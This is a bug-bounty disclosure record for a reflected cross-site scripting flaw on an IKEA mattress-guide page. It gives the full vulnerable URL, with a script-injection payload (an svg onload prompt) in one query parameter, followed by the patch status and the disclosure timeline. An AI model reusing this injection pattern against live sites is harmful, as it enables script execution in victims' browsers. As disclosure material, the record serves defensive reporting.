logo
DATABASE RESOURCES PRICING ABOUT US

rabbithole.ikea.com XSS vulnerability

Description

##### Vulnerable URL: http://rabbithole.ikea.com/mattress_guide/results.php?ftype=2&fsize;=2&fwidth;=3&ffirm;=2&fmem;=1&fmem2;=0&fbase;=1&fbase2;=0&fbonnell;=1&fbonnell2;=0&fpocket;=1&fpocket2;=0&fcomfort;=1&fcomfort2;=0&fnatural;=1&fnatural2;=0&fresiliance;=1&fresiliance2;=0&fextra;=1&fextra2;=0&fwash;=1&fwash2;=0&fsize;=`-%27%22%3E%3Csvg/onload=prompt(/OPENBUGBOUNTY/)%3E ##### Details: Description| Value ---|--- Patched:| Yes, at 25.11.2017 Latest check for patch:| 25.11.2017 19:44 GMT Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| Unknown / Not calculated VIP website status:| No Check rabbithole.ikea.com SSL connection:| (Grade: F) ##### Coordinated Disclosure Timeline: Description| Value ---|--- Vulnerability submitted via Open Bug Bounty| 28 April, 2017 04:10 GMT Generic security notifications sent to website owner| 28 April, 2017 04:13 GMT Notification sent to subscribers (without technical details)| 28 April, 2017 06:17 GMT Vulnerability details disclosed by researcher| 21 July, 2017 04:15 GMT Vulnerability patched by the website owner| 25 November, 2017 19:44 GMT